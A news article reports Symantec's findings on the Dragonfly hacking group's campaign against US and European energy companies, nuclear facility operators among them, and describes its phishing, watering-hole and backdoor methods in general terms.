Dragonfly Russian Hacker Group Gains Access To U.S. And European Energy Grids Including Nuclear Plants

If you thought putting Homer Simpson in charge of a nuclear power plant seemed like a scary proposition, well, you would be right. But sometimes truth is stranger (and in this case, scarier) than fiction. Such is the case with security outfit Symantec reporting that hackers have been targeting the energy sector in Europe and North America since at least 2011. And if that's not frightening enough, they have kicked up their efforts in the past couple of years and even managed to breach companies that manage nuclear facilities in the United States.

The group behind these attacks is known as Dragonfly. As part of the group's Dragonfly 2.0 cyber campaign, the hackers have been zeroing in on energy facilities. They were able to disrupt Ukraine's power system in 2015 and 2016, leading to power outages affecting hundreds of thousands of people. And in recent months.there have been reports of attempted attacks on electricity grids in Europe.


"The Dragonfly group appears to be interested in both learning how energy facilities operate and also gaining access to operational systems themselves, to the extent that the group now potentially has the ability to sabotage or gain control of these systems should it decide to do so. Symantec customers are protected against the activities of the Dragonfly group," Symantec says.

While companies that employ Symantec's security solutions are supposedly protected against these threats, the bigger concern is what might happen if attackers are successful in taking over a nuclear facility or energy grid. At that point, it will not matter what type of security software anyone is running.

As with many hacking attempts, Dragonfly sometimes uses email and phishing schemes to compromise a company's network. One method involves an email-based attack using a toolkit called Phishery. The toolkit consists of a Trojan virus designed to steam a victim's credentials by way of a template injection attack.

In addition to leveraging email, Symantec says attackers have also used watering hole attacks to collect login credentials. This works by compromising websites that are likely to be visited by those involved in the energy sector. In one instance, attackers were able to steal an energy official's credentials by compromising a server and installing Backdoor.Goodor on the victim's machine. This gave the attacker remote access to that person's system.